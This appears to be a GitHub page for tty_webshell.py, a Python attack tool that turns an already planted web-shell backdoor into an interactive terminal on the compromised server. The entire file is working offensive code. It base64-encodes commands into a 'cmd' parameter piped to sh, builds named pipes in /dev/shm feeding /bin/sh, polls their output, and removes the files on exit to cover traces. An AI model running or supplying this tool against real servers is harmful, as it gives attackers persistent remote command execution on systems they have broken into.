-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtty_webshell.py
89 lines (73 loc) · 2.05 KB
/
tty_webshell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/python3
import requests, time, threading, pdb, signal, sys, re
from base64 import b64encode
from random import randrange
url=""
if len(sys.argv) != 2:
print("\n\n\t[!] Usage: %s {url_with_backdoor}\n\n" % (sys.argv[0]))
sys.exit(1)
else:
url=sys.argv[1]
class AllTheReads(object):
def __init__(self, interval=1):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
readoutput = """/bin/cat %s""" % (stdout)
clearoutput = """echo '' > %s""" % (stdout)
while True:
output = RunCmd(readoutput)
cleaned_output = re.sub(r'<pre>|</pre>', '', output)
RunCmd(clearoutput)
if cleaned_output:
print(cleaned_output)
time.sleep(self.interval)
def RunCmd(cmd):
cmd = cmd.encode('utf-8')
cmd = b64encode(cmd).decode('utf-8')
payload = {
'cmd' : 'echo "%s" | base64 -d | sh' %(cmd)
}
result = (requests.get(url, params=payload, timeout=5).text).strip()
return result
def WriteCmd(cmd):
cmd = cmd.encode('utf-8')
cmd = b64encode(cmd).decode('utf-8')
payload = {
'cmd' : 'echo "%s" | base64 -d > %s' % (cmd, stdin)
}
result = (requests.get(url, params=payload, timeout=5).text).strip()
return result
def ReadCmd():
GetOutput = """/bin/cat %s""" % (stdout)
output = RunCmd(GetOutput)
return output
def SetupShell():
NamedPipes = """mkfifo %s; tail -f %s | /bin/sh 2>&1 > %s""" % (stdin, stdin, stdout)
try:
RunCmd(NamedPipes)
except:
None
return None
global stdin, stdout
session = randrange(1000, 9999)
stdin = "/dev/shm/input.%s" % (session)
stdout = "/dev/shm/output.%s" % (session)
erasestdin = """/bin/rm %s""" % (stdin)
erasestdout = """/bin/rm %s""" % (stdout)
SetupShell()
ReadingTheThings = AllTheReads()
def sig_handler(sig, frame):
print("\n\n[*] Exiting...\n")
print("[*] Removing files...\n")
RunCmd(erasestdin)
RunCmd(erasestdout)
print("[*] All files have been deleted\n")
sys.exit(0)
signal.signal(signal.SIGINT, sig_handler)
while True:
cmd = input("> ")
WriteCmd(cmd + "\n")
time.sleep(1.1)